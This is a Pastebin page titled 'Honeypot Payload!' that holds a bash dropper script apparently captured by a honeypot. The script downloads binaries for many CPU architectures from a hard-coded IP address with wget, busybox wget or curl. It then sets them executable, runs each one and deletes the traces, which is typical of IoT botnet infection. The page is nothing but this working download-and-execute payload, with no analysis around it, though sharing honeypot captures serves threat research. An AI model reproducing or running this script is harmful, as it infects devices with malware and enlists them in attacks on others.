Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-03-10 01:36

Mar 9th, 2016
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.74 KB | None | 0 0
  1. #!/bin/bash
  2. rm -f blj* blj*.* bljarmv4l bljarmv5l bljarmv6l blji586 blji686 bljm68k bljmips bljmipsel bljsh4 bljx86_64 blj.sh
  3. wget -q http://149.202.153.56/a/bljarmv4l || busybox wget -q http://149.202.153.56/a/bljarmv4l || curl -s -O http://149.202.153.56/a/bljarmv4l
  4. wget -q http://149.202.153.56/a/bljarmv5l || busybox wget -q http://149.202.153.56/a/bljarmv5l || curl -s -O http://149.202.153.56/a/bljarmv5l
  5. wget -q http://149.202.153.56/a/bljarmv6l || busybox wget -q http://149.202.153.56/a/bljarmv6l || curl -s -O http://149.202.153.56/a/bljarmv6l
  6. wget -q http://149.202.153.56/a/blji586 || busybox wget -q http://149.202.153.56/a/blji586 || curl -s -O http://149.202.153.56/a/blji586
  7. wget -q http://149.202.153.56/a/blji686 || busybox wget -q http://149.202.153.56/a/blji686 || curl -s -O http://149.202.153.56/a/blji686
  8. wget -q http://149.202.153.56/a/bljm68k || busybox wget -q http://149.202.153.56/a/bljm68k || curl -s -O http://149.202.153.56/a/bljm68k
  9. wget -q http://149.202.153.56/a/bljmips || busybox wget -q http://149.202.153.56/a/bljmips || curl -s -O http://149.202.153.56/a/bljmips
  10. wget -q http://149.202.153.56/a/bljmipsel || busybox wget -q http://149.202.153.56/a/bljmipsel || curl -s -O http://149.202.153.56/a/bljmipsel
  11. wget -q http://149.202.153.56/a/bljsh4 || busybox wget -q http://149.202.153.56/a/bljsh4 || curl -s -O http://149.202.153.56/a/bljsh4
  12. wget -q http://149.202.153.56/a/bljx86_64 || busybox wget -q http://149.202.153.56/a/bljx86_64 || curl -s -O http://149.202.153.56/a/bljx86_64
  13. busybox chmod 777 blj*
  14. chmod 777 blj*
  15. ./bljarmv4l
  16. ./bljarmv5l
  17. ./bljarmv6l
  18. ./blji586
  19. ./blji686
  20. ./bljm68k
  21. ./bljmips
  22. ./bljmipsel
  23. ./bljsh4
  24. ./bljx86_64
  25. rm -f blj* blj*.* bljarmv4l bljarmv5l bljarmv6l blji586 blji686 bljm68k bljmips bljmipsel bljsh4 bljx86_64 blj.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement